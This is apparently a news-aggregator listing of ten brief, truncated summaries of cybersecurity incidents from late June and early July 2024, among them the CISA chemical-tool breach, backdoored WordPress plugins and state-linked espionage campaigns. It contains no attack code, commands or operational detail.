July 2, 2024 at 01:41AM A South Korean ERP vendor’s product update server was breached, resulting in the delivery of malware instead of legitimate updates. The attack, potentially linked to the North Korea-associated Andariel group, targeted ERP systems with backdoors named HotCroissant and Riffdoor. This incident, detected by AhnLab, highlights the threat posed by such … Read more
July 1, 2024 at 02:34PM Juniper Networks released an emergency patch for a critical authentication bypass vulnerability, tracked as CVE-2024-2973, affecting Session Smart Router, Conductor, and WAN Assurance Router. The flaw, found internally, has the highest CVSS score of 10. Immediate updates for affected devices are recommended to prevent exploitation. Automatic updates will not disrupt … Read more
June 28, 2024 at 08:10AM Security researchers have uncovered details about the 8220 Gang’s cryptocurrency mining operation, exploiting known vulnerabilities in Oracle WebLogic Server. The threat actor uses fileless execution techniques and a multi-stage loading technique, including dropping a miner payload via PowerShell script. Additionally, a new installer tool called k4spreader has been detailed, used … Read more
June 27, 2024 at 01:57PM Becky Bracken, Senior Editor, Dark Reading, hosts a podcast featuring guests discussing the complexities of ransomware negotiations. The episode highlights the importance of professional expertise and emotional control when facing cyber threats. The guests, Ed Dubrovsky and Joe Tarraf, stress the need for international cooperation and a proactive approach to … Read more
June 26, 2024 at 06:10AM A China-backed APT group, ChamelGang, has been using ransomware to hide its cyberespionage operations for three years. Recently targeting critical infrastructure in East Asia and India, the group’s tactic aims to provide deniability and cover tracks while exfiltrating data. ChamelGang’s focus on data theft and cyberespionage is attributed to geopolitical … Read more
June 25, 2024 at 04:05PM A threat actor may have accessed critical data on US chemical facilities by exploiting vulnerabilities in the CISA’s Chemical Security Assessment Tool. The compromised information includes chemical inventories, security assessments, and personnel details. This breach poses potential safety risks, and affected organizations are advised to review and enhance their cybersecurity … Read more
June 25, 2024 at 03:32PM Threat actor altered WordPress plugins on WordPress.org to insert malicious code, creating new admin accounts and injecting SEO spam. Wordfence discovered the breach and notified developers, resulting in patches for most affected products. The compromised plugins include Social Warfare, Blaze Widget, Wrapper Link Element, Contact Form 7 Multi-Step Addon, and … Read more
June 25, 2024 at 10:55AM Luxury retailer Neiman Marcus confirmed a data breach after hackers attempted to sell the company’s stolen database from recent Snowflake data theft attacks. The breach impacted 64,472 people, exposing personal information such as names, contact details, and gift card numbers. The breach was likely linked to threat actor “Sp1d3r” and … Read more
June 24, 2024 at 04:58PM CISA’s Chemical Security Assessment Tool (CSAT) suffered a breach in January when hackers deployed a webshell on its Ivanti device, potentially exposing sensitive security assessments and plans. CISA confirmed the breach, stating that while no evidence of data theft was found, they are notifying potentially impacted individuals and organizations out … Read more
June 24, 2024 at 04:24AM Between November 2023 and April 2024, a China-linked state-sponsored threat actor named RedJuliett conducted a cyber espionage campaign targeting government, academic, and diplomatic organizations in Taiwan. They utilized various techniques, including deploying web shells and exploiting vulnerabilities, with a focus on collecting intelligence related to Taiwan’s economic policy and diplomatic … Read more